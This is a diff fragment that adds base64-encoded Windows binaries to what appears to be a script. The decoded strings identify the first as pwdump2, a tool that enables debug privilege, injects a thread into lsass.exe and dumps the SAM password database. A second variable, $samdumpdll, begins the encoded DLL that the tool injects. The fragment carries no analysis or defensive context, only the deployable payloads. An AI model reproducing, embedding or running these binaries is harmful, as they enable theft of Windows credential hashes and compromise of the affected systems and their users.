+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRmAABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAA
+JGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcAAEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADW
+ZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAAQGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5o
+AADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABSaQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkA
+ANRpAADgaQAA8GkAAABqAAAAAAAA/////wcdQAAbHUAABgAABgABAAAQAAMGAAYCEARFRUUFBQUF
+BTUwAFAAAAAAICg4UFgHCAA3MDBXUAcAACAgCAAAAAAIYGhgYGBgAABwcHh4eHgIBwgAAAcACAgI
+AAAIAAgABwgAAAAoAG4AdQBsAGwAKQAAAAAAKG51bGwpAABydW50aW1lIGVycm9yIAAADQoAAFRM
+T1NTIGVycm9yDQoAAABTSU5HIGVycm9yDQoAAAAARE9NQUlOIGVycm9yDQoAAFI2MDI4DQotIHVu
+YWJsZSB0byBpbml0aWFsaXplIGhlYXANCgAAAABSNjAyNw0KLSBub3QgZW5vdWdoIHNwYWNlIGZv
+ciBsb3dpbyBpbml0aWFsaXphdGlvbg0KAAAAAFI2MDI2DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9y
+IHN0ZGlvIGluaXRpYWxpemF0aW9uDQoAAAAAUjYwMjUNCi0gcHVyZSB2aXJ0dWFsIGZ1bmN0aW9u
+IGNhbGwNCgAAAFI2MDI0DQotIG5vdCBlbm91Z2ggc3BhY2UgZm9yIF9vbmV4aXQvYXRleGl0IHRh
+YmxlDQoAAAAAUjYwMTkNCi0gdW5hYmxlIHRvIG9wZW4gY29uc29sZSBkZXZpY2UNCgAAAABSNjAx
+OA0KLSB1bmV4cGVjdGVkIGhlYXAgZXJyb3INCgAAAABSNjAxNw0KLSB1bmV4cGVjdGVkIG11bHRp
+dGhyZWFkIGxvY2sgZXJyb3INCgAAAABSNjAxNg0KLSBub3QgZW5vdWdoIHNwYWNlIGZvciB0aHJl
+YWQgZGF0YQ0KAA0KYWJub3JtYWwgcHJvZ3JhbSB0ZXJtaW5hdGlvbg0KAAAAAFI2MDA5DQotIG5v
+dCBlbm91Z2ggc3BhY2UgZm9yIGVudmlyb25tZW50DQoAUjYwMDgNCi0gbm90IGVub3VnaCBzcGFj
+ZSBmb3IgYXJndW1lbnRzDQoAAABSNjAwMg0KLSBmbG9hdGluZyBwb2ludCBub3QgbG9hZGVkDQoA
+AAAATWljcm9zb2Z0IFZpc3VhbCBDKysgUnVudGltZSBMaWJyYXJ5AAAAAAoKAABSdW50aW1lIEVy
+cm9yIQoKUHJvZ3JhbTogAAAALi4uADxwcm9ncmFtIG5hbWUgdW5rbm93bj4AAAAAAAAAAAAA////
+/+tMQADvTEAAR2V0TGFzdEFjdGl2ZVBvcHVwAABHZXRBY3RpdmVXaW5kb3cATWVzc2FnZUJveEEA
+dXNlcjMyLmRsbAAA/////79WQADDVkAA/////3NXQAB3V0AAFGUAAAAAAAAAAAAAamcAABBgAAAE
+ZQAAAAAAAAAAAAC8ZwAAAGAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAqGcAAJBnAAB4ZwAAAAAAABRm
+AABKZgAAWmYAAGpmAAB4ZgAAhmYAAJpmAACqZgAAJGYAADpmAADoZgAA/mYAABRnAAAqZwAANmcA
+AEpnAABWZwAAAmYAANZmAADAZgAA/mcAAMpnAADWZwAA5GcAAPBnAAD0ZQAAEmgAACRoAAAyaAAA
+QGgAAE5oAABcaAAAbGgAAH5oAACOaAAAnGgAAK5oAADKaAAA5GgAAP5oAAAUaQAALGkAAEZpAABS
+aQAAXmkAAHJpAACIaQAAmmkAAKxpAAC+aQAAymkAANRpAADgaQAA8GkAAABqAAAAAAAAwwBGcmVl
+TGlicmFyeQBTAUdldFByb2NBZGRyZXNzAADfAUxvYWRMaWJyYXJ5QQAA/QJXYWl0Rm9yU2luZ2xl
+T2JqZWN0AE0AQ3JlYXRlVGhyZWFkAAA0AENyZWF0ZUV2ZW50QQAALQFHZXRMYXN0RXJyb3IAABEC
+T3BlblByb2Nlc3MAHgBDbG9zZUhhbmRsZQAJAUdldEN1cnJlbnRQcm9jZXNzAPICVmlydHVhbEZy
+ZWVFeABJAENyZWF0ZVJlbW90ZVRocmVhZAAAFwNXcml0ZVByb2Nlc3NNZW1vcnkAAO8CVmlydHVh
+bEFsbG9jRXgAAAoBR2V0Q3VycmVudFByb2Nlc3NJZAA4AUdldE1vZHVsZUZpbGVOYW1lQQAAZQBE
+aXNjb25uZWN0TmFtZWRQaXBlAD0CUmVhZEZpbGUAACYAQ29ubmVjdE5hbWVkUGlwZQAAkAJTZXRF
+dmVudAAARABDcmVhdGVOYW1lZFBpcGVBAABLRVJORUwzMi5kbGwAABkAQWRqdXN0VG9rZW5Qcml2
+aWxlZ2VzABgBTG9va3VwUHJpdmlsZWdlVmFsdWVBAGcBT3BlblByb2Nlc3NUb2tlbgAAQURWQVBJ
+MzIuZGxsAAC6AUhlYXBGcmVlAAC9AUhlYXBSZUFsbG9jALQBSGVhcEFsbG9jAIwARXhpdFByb2Nl
+c3MAywJUZXJtaW5hdGVQcm9jZXNzAADaAEdldENvbW1hbmRMaW5lQQCOAUdldFZlcnNpb24AALgB
+SGVhcERlc3Ryb3kAtgFIZWFwQ3JlYXRlAADxAlZpcnR1YWxGcmVlAO4CVmlydHVhbEFsbG9jAACY
+AlNldEhhbmRsZUNvdW50AABoAUdldFN0ZEhhbmRsZQAAKAFHZXRGaWxlVHlwZQBmAUdldFN0YXJ0
+dXBJbmZvQQDbAlVuaGFuZGxlZEV4Y2VwdGlvbkZpbHRlcgAAwQBGcmVlRW52aXJvbm1lbnRTdHJp
+bmdzQQDCAEZyZWVFbnZpcm9ubWVudFN0cmluZ3NXAAEDV2lkZUNoYXJUb011bHRpQnl0ZQAZAUdl
+dEVudmlyb25tZW50U3RyaW5ncwAbAUdldEVudmlyb25tZW50U3RyaW5nc1cAAFcCUnRsVW53aW5k
+AA4DV3JpdGVGaWxlALkARmx1c2hGaWxlQnVmZmVycwAAAgJNdWx0aUJ5dGVUb1dpZGVDaGFyAGkB
+R2V0U3RyaW5nVHlwZUEAAGwBR2V0U3RyaW5nVHlwZVcAAJUCU2V0RmlsZVBvaW50ZXIAAM8AR2V0
+Q1BJbmZvAMkAR2V0QUNQAABGAUdldE9FTUNQAACoAlNldFN0ZEhhbmRsZQAA3AFMQ01hcFN0cmlu
+Z0EAAN0BTENNYXBTdHJpbmdXAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAHQZQADUUkAAAAAAAAAAAAAZGkAAAAAAAAAAAAAAAAAAAAAAAEwAUwBBAFMA
+UwAuAEUAWABFAAAAUnRsQ29tcGFyZVVuaWNvZGVTdHJpbmcATnRRdWVyeVN5c3RlbUluZm9ybWF0
+aW9uAAAAAE5URExMAAAAClB3ZHVtcDIgLSBkdW1wIHRoZSBTQU0gZGF0YWJhc2UuClVzYWdlOiAl
+cyA8cGlkIG9mIGxzYXNzLmV4ZT4KAEZhaWxlZCBzdGFydGluZyBsaXN0ZW4gb24gcGlwZTogJWQu
+ICBFeGl0aW5nCgAAAEZhaWxlZCB0byBjcmVhdGUgcmVjZWl2aW5nIHRocmVhZDogJWQuICBFeGl0
+aW5nCgAAAABGYWlsZWQgdG8gb3BlbiBsc2FzczogJWQuICBFeGl0aW5nLgoAAAAARmFpbGVkIGVu
+YWJsaW5nIERlYnVnIHByaXZpbGVnZS4gIFByb2NlZWRpbmcgYW55d2F5CgAAAABVbmFibGUgdG8g
+ZmluZCBsc2Fzcy5leGUgcGlkIGF1dG9tYXRpY2FsbHkuCllvdSBuZWVkIHRvIHNwZWNpZnkgb24g
+dGhlIGNvbW1hbmQgbGluZQoAAAAAVW5hYmxlIHRvIGFkanVzdCB0b2tlbiBwcml2aWxlZ2VzOiAl
+ZAoAAFVuYWJsZSB0byBsb29rdXAgcHJpdmlsZWdlOiAlZAoAU2VEZWJ1Z1ByaXZpbGVnZQAAAABV
+bmFibGUgdG8gb3BlbiBwcm9jZXNzIHRva2VuOiAlZAoAAABDcmVhdGVSZW1vdGVUaHJlYWQgZmFp
+bGVkOiAlZAoAAFdyaXRlUHJvY2Vzc01lbW9yeSBmYWlsZWQ6ICVkCgAAVmlydHVhbEFsbG9jRXgg
+ZmFpbGVkOiAlZAoAAFxcLlxwaXBlXHB3ZHVtcDItJWQARHVtcFNhbQBTYW1EdW1wLmRsbABGcmVl
+TGlicmFyeQBHZXRQcm9jQWRkcmVzcwAATG9hZExpYnJhcnlBAAAAAEtlcm5lbDMyAAAAACVzAABG
+YWlsZWQgdG8gY29ubmVjdCB0aGUgcGlwZTogJWQKAEZhaWxlZCB0byBjcmVhdGUgdGhlIHBpcGU6
+ICVkCgAAAAAAAACBQAAAAAAAAIFAAAEBAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAgAA
+AAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAABNGEAAAQAAABAAAAD4AwAAaGFAAFhhQAD/////AAoAAAp2
+QAAKdkAAAAAgACAAIAAgACAAIAAgACAAIAAoACgAKAAoACgAIAAgACAAIAAgACAAIAAgACAAIAAg
+ACAAIAAgACAAIAAgACAASAAQABAAEAAQABAAEAAQABAAEAAQABAAEAAQABAAEACEAIQAhACEAIQA
+hACEAIQAhACEABAAEAAQABAAEAAQABAAgQCBAIEAgQCBAIEAAQABAAEAAQABAAEAAQABAAEAAQAB
+AAEAAQABAAEAAQABAAEAAQABABAAEAAQABAAEAAQAIIAggCCAIIAggCCAAIAAgACAAIAAgACAAIA
+AgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAQABAAEAAQACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAQAAAC4AAAABAAAAAAAAAAAAAAAFAADACwAAAAAAAAAdAADABAAAAAAAAACWAADA
+BAAAAAAAAACNAADACAAAAAAAAACOAADACAAAAAAAAACPAADACAAAAAAAAACQAADACAAAAAAAAACR
+AADACAAAAAAAAACSAADACAAAAAAAAACTAADACAAAAAAAAAADAAAABwAAAAoAAACMAAAAIAWTGQAA
+AAAAAAAAAAAAAAIAAADUY0AACAAAAKhjQAAJAAAAfGNAAAoAAABYY0AAEAAAACxjQAARAAAA/GJA
+ABIAAADYYkAAEwAAAKxiQAAYAAAAdGJAABkAAABMYkAAGgAAABRiQAAbAAAA3GFAABwAAAC0YUAA
+eAAAAKRhQAB5AAAAlGFAAHoAAACEYUAA/AAAAIBhQAD/AAAAcGFAAAAAAAAAAAAAeVNAAHlTQAB5
+U0AAeVNAAHlTQAB5U0AAAAAAAAAAAAABAgQIAAAAAKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGl
+AAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4A
+AAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAA
+AAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR
+2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAAAEAAAAWAAAAAgAAAAIA
+AAADAAAAAgAAAAQAAAAYAAAABQAAAA0AAAAGAAAACQAAAAcAAAAMAAAACAAAAAwAAAAJAAAADAAA
+AAoAAAAHAAAACwAAAAgAAAAMAAAAFgAAAA0AAAAWAAAADwAAAAIAAAAQAAAADQAAABEAAAASAAAA
+EgAAAAIAAAAhAAAADQAAADUAAAACAAAAQQAAAA0AAABDAAAAAgAAAFAAAAARAAAAUgAAAA0AAABT
+AAAADQAAAFcAAAAWAAAAWQAAAAsAAABsAAAADQAAAG0AAAAgAAAAcAAAABwAAAByAAAACQAAAAYA
+AAAWAAAAgAAAAAoAAACBAAAACgAAAIIAAAAJAAAAgwAAABYAAACEAAAADQAAAJEAAAApAAAAngAA
+AA0AAAChAAAAAgAAAKQAAAALAAAApwAAAA0AAAC3AAAAEQAAAM4AAAACAAAA1wAAAAsAAAAYBwAA
+DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=";
+
+$samdumpdll="TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1v
+ZGUuDQ0KJAAAAAAAAAA5YhDKfQN+mX0Dfpl9A36ZlRx1mXwDfpmVHHSZNwN+mf4fcJluA36ZJCBt
+mXgDfpl9A3+ZNAN+mYIjdJl8A36ZgiN6mXwDfplSaWNofQN+mQAAAAAAAAAAUEUAAEwBBAAT+OA4
+AAAAAAAAAADgAA4hCwEGAABQAAAAUAAAAAAAAIoaAAAAEAAAAGAAAAAAABAAEAAAABAAAAQAAAAA
+AAAABAAAAAAAAAAAsAAAABAAAAAAAAACAAAAAAAQAAAQAAAAABAAABAAAAAAAAAQAAAAYGsAAEYA
+AAAwZgAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACgAADkBQAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAOwAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAudGV4dAAAAKJNAAAAEAAAAFAAAAAQAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAACm
+CwAAAGAAAAAQAAAAYAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAoCYAAABwAAAAEAAAAHAAAAAA
+AAAAAAAAAAAAAEAAAMAucmVsb2MAAJQMAAAAoAAAABAAAACAAAAAAAAAAAAAAAAAAABAAABCAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
